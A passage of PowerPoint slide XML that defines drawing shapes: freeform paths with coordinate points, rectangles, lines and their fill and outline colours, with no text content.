                    <a:lnTo>
                      <a:pt x="14" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10602" name="Freeform 9"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1904" y="3029"/>
                <a:ext cx="112" cy="72"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 112"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 112"/>
                  <a:gd name="T3" fmla="*/ 72 h 72"/>
                  <a:gd name="T4" fmla="*/ 69 w 112"/>
                  <a:gd name="T5" fmla="*/ 72 h 72"/>
                  <a:gd name="T6" fmla="*/ 112 w 112"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 43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43" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="33CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10603" name="Rectangle 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1961" y="2796"/>
                <a:ext cx="52" cy="236"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="33CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10604" name="Rectangle 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1905" y="2863"/>
                <a:ext cx="71" cy="236"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="33CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10605" name="Rectangle 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1905" y="2863"/>
                <a:ext cx="71" cy="236"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10606" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1904" y="2793"/>
                <a:ext cx="112" cy="72"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 112"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 112"/>
                  <a:gd name="T3" fmla="*/ 72 h 72"/>
                  <a:gd name="T4" fmla="*/ 69 w 112"/>
                  <a:gd name="T5" fmla="*/ 72 h 72"/>
                  <a:gd name="T6" fmla="*/ 112 w 112"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 43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43" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="33CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10607" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1904" y="2793"/>
                <a:ext cx="112" cy="72"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 112"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 112"/>
                  <a:gd name="T3" fmla="*/ 72 h 72"/>
                  <a:gd name="T4" fmla="*/ 69 w 112"/>
                  <a:gd name="T5" fmla="*/ 72 h 72"/>
                  <a:gd name="T6" fmla="*/ 112 w 112"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 43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43" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10608" name="Line 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2016" y="2799"/>
                <a:ext cx="1" cy="230"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10609" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1976" y="3029"/>
                <a:ext cx="40" cy="70"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10610" name="Rectangle 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1915" y="2894"/>
                <a:ext cx="46" cy="135"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10611" name="Rectangle 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1915" y="2894"/>
                <a:ext cx="46" cy="135"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10612" name="Rectangle 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1922" y="2935"/>
                <a:ext cx="35" cy="48"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10613" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1200" y="2797"/>
                <a:ext cx="249" cy="208"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 249"/>
                  <a:gd name="T1" fmla="*/ 14 h 208"/>
                  <a:gd name="T2" fmla="*/ 70 w 249"/>
                  <a:gd name="T3" fmla="*/ 14 h 208"/>
                  <a:gd name="T4" fmla="*/ 73 w 249"/>
                  <a:gd name="T5" fmla="*/ 14 h 208"/>
                  <a:gd name="T6" fmla="*/ 75 w 249"/>
                  <a:gd name="T7" fmla="*/ 13 h 208"/>
                  <a:gd name="T8" fmla="*/ 79 w 249"/>
                  <a:gd name="T9" fmla="*/ 12 h 208"/>
                  <a:gd name="T10" fmla="*/ 83 w 249"/>
                  <a:gd name="T11" fmla="*/ 10 h 208"/>
                  <a:gd name="T12" fmla="*/ 88 w 249"/>
                  <a:gd name="T13" fmla="*/ 9 h 208"/>
                  <a:gd name="T14" fmla="*/ 95 w 249"/>
                  <a:gd name="T15" fmla="*/ 8 h 208"/>
                  <a:gd name="T16" fmla="*/ 103 w 249"/>
                  <a:gd name="T17" fmla="*/ 6 h 208"/>
                  <a:gd name="T18" fmla="*/ 111 w 249"/>
                  <a:gd name="T19" fmla="*/ 5 h 208"/>
                  <a:gd name="T20" fmla="*/ 121 w 249"/>
                  <a:gd name="T21" fmla="*/ 3 h 208"/>
                  <a:gd name="T22" fmla="*/ 132 w 249"/>
                  <a:gd name="T23" fmla="*/ 2 h 208"/>
                  <a:gd name="T24" fmla="*/ 144 w 249"/>
                  <a:gd name="T25" fmla="*/ 1 h 208"/>
                  <a:gd name="T26" fmla="*/ 157 w 249"/>
                  <a:gd name="T27" fmla="*/ 0 h 208"/>
                  <a:gd name="T28" fmla="*/ 170 w 249"/>
                  <a:gd name="T29" fmla="*/ 0 h 208"/>
                  <a:gd name="T30" fmla="*/ 185 w 249"/>
                  <a:gd name="T31" fmla="*/ 0 h 208"/>
                  <a:gd name="T32" fmla="*/ 201 w 249"/>
                  <a:gd name="T33" fmla="*/ 0 h 208"/>
                  <a:gd name="T34" fmla="*/ 208 w 249"/>
                  <a:gd name="T35" fmla="*/ 28 h 208"/>
                  <a:gd name="T36" fmla="*/ 210 w 249"/>
                  <a:gd name="T37" fmla="*/ 29 h 208"/>
                  <a:gd name="T38" fmla="*/ 216 w 249"/>
                  <a:gd name="T39" fmla="*/ 33 h 208"/>
                  <a:gd name="T40" fmla="*/ 222 w 249"/>
                  <a:gd name="T41" fmla="*/ 40 h 208"/>
                  <a:gd name="T42" fmla="*/ 226 w 249"/>
                  <a:gd name="T43" fmla="*/ 50 h 208"/>
                  <a:gd name="T44" fmla="*/ 240 w 249"/>
                  <a:gd name="T45" fmla="*/ 116 h 208"/>
                  <a:gd name="T46" fmla="*/ 247 w 249"/>
                  <a:gd name="T47" fmla="*/ 144 h 208"/>
                  <a:gd name="T48" fmla="*/ 247 w 249"/>
                  <a:gd name="T49" fmla="*/ 146 h 208"/>
                  <a:gd name="T50" fmla="*/ 248 w 249"/>
                  <a:gd name="T51" fmla="*/ 151 h 208"/>
                  <a:gd name="T52" fmla="*/ 248 w 249"/>
                  <a:gd name="T53" fmla="*/ 159 h 208"/>
                  <a:gd name="T54" fmla="*/ 244 w 249"/>
                  <a:gd name="T55" fmla="*/ 169 h 208"/>
                  <a:gd name="T56" fmla="*/ 0 w 249"/>
                  <a:gd name="T57" fmla="*/ 162 h 208"/>
                  <a:gd name="T58" fmla="*/ 25 w 249"/>
                  <a:gd name="T59" fmla="*/ 149 h 208"/>
                  <a:gd name="T60" fmla="*/ 25 w 249"/>
                  <a:gd name="T61" fmla="*/ 28 h 208"/>
                  <a:gd name="T62" fmla="*/ 26 w 249"/>
                  <a:gd name="T63" fmla="*/ 27 h 208"/>
                  <a:gd name="T64" fmla="*/ 28 w 249"/>
                  <a:gd name="T65" fmla="*/ 26 h 208"/>
                  <a:gd name="T66" fmla="*/ 32 w 249"/>
                  <a:gd name="T67" fmla="*/ 24 h 208"/>
                  <a:gd name="T68" fmla="*/ 37 w 249"/>
                  <a:gd name="T69" fmla="*/ 22 h 208"/>
                  <a:gd name="T70" fmla="*/ 42 w 249"/>
                  <a:gd name="T71" fmla="*/ 22 h 208"/>
                  <a:gd name="T72" fmla="*/ 49 w 249"/>
                  <a:gd name="T73" fmla="*/ 22 h 208"/>
                  <a:gd name="T74" fmla="*/ 58 w 249"/>
                  <a:gd name="T75" fmla="*/ 23 h 208"/>
                  <a:gd name="T76" fmla="*/ 68 w 249"/>
                  <a:gd name="T77" fmla="*/ 27 h 20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49"/>
                  <a:gd name="T118" fmla="*/ 0 h 208"/>
                  <a:gd name="T119" fmla="*/ 249 w 249"/>
                  <a:gd name="T120" fmla="*/ 208 h 20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49" h="208">
                    <a:moveTo>
                      <a:pt x="68" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10614" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1287" y="2812"/>
                <a:ext cx="79" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 79"/>
                  <a:gd name="T1" fmla="*/ 4 h 91"/>
                  <a:gd name="T2" fmla="*/ 78 w 79"/>
                  <a:gd name="T3" fmla="*/ 4 h 91"/>
                  <a:gd name="T4" fmla="*/ 77 w 79"/>
                  <a:gd name="T5" fmla="*/ 4 h 91"/>
                  <a:gd name="T6" fmla="*/ 74 w 79"/>
                  <a:gd name="T7" fmla="*/ 2 h 91"/>
                  <a:gd name="T8" fmla="*/ 72 w 79"/>
                  <a:gd name="T9" fmla="*/ 2 h 91"/>
                  <a:gd name="T10" fmla="*/ 69 w 79"/>
                  <a:gd name="T11" fmla="*/ 1 h 91"/>
                  <a:gd name="T12" fmla="*/ 65 w 79"/>
                  <a:gd name="T13" fmla="*/ 1 h 91"/>
                  <a:gd name="T14" fmla="*/ 60 w 79"/>
                  <a:gd name="T15" fmla="*/ 1 h 91"/>
                  <a:gd name="T16" fmla="*/ 56 w 79"/>
                  <a:gd name="T17" fmla="*/ 0 h 91"/>
                  <a:gd name="T18" fmla="*/ 50 w 79"/>
                  <a:gd name="T19" fmla="*/ 0 h 91"/>
                  <a:gd name="T20" fmla="*/ 44 w 79"/>
                  <a:gd name="T21" fmla="*/ 0 h 91"/>
                  <a:gd name="T22" fmla="*/ 38 w 79"/>
                  <a:gd name="T23" fmla="*/ 1 h 91"/>
                  <a:gd name="T24" fmla="*/ 31 w 79"/>
                  <a:gd name="T25" fmla="*/ 2 h 91"/>
                  <a:gd name="T26" fmla="*/ 25 w 79"/>
                  <a:gd name="T27" fmla="*/ 4 h 91"/>
                  <a:gd name="T28" fmla="*/ 18 w 79"/>
                  <a:gd name="T29" fmla="*/ 6 h 91"/>
                  <a:gd name="T30" fmla="*/ 11 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 91"/>
                  <a:gd name="T32" fmla="*/ 4 w 79"/>
                  <a:gd name="T33" fmla="*/ 11 h 91"/>
                  <a:gd name="T34" fmla="*/ 4 w 79"/>
                  <a:gd name="T35" fmla="*/ 13 h 91"/>
                  <a:gd name="T36" fmla="*/ 3 w 79"/>
                  <a:gd name="T37" fmla="*/ 18 h 91"/>
                  <a:gd name="T38" fmla="*/ 1 w 79"/>
                  <a:gd name="T39" fmla="*/ 26 h 91"/>
                  <a:gd name="T40" fmla="*/ 0 w 79"/>
                  <a:gd name="T41" fmla="*/ 35 h 91"/>
                  <a:gd name="T42" fmla="*/ 0 w 79"/>
                  <a:gd name="T43" fmla="*/ 47 h 91"/>
                  <a:gd name="T44" fmla="*/ 0 w 79"/>
                  <a:gd name="T45" fmla="*/ 60 h 91"/>
                  <a:gd name="T46" fmla="*/ 2 w 79"/>
                  <a:gd name="T47" fmla="*/ 74 h 91"/>
                  <a:gd name="T48" fmla="*/ 6 w 79"/>
                  <a:gd name="T49" fmla="*/ 89 h 91"/>
                  <a:gd name="T50" fmla="*/ 7 w 79"/>
                  <a:gd name="T51" fmla="*/ 89 h 91"/>
                  <a:gd name="T52" fmla="*/ 8 w 79"/>
                  <a:gd name="T53" fmla="*/ 89 h 91"/>
                  <a:gd name="T54" fmla="*/ 9 w 79"/>
                  <a:gd name="T55" fmla="*/ 88 h 91"/>
                  <a:gd name="T56" fmla="*/ 11 w 79"/>
                  <a:gd name="T57" fmla="*/ 88 h 91"/>
                  <a:gd name="T58" fmla="*/ 15 w 79"/>
                  <a:gd name="T59" fmla="*/ 88 h 91"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 88 h 91"/>
                  <a:gd name="T62" fmla="*/ 22 w 79"/>
                  <a:gd name="T63" fmla="*/ 88 h 91"/>
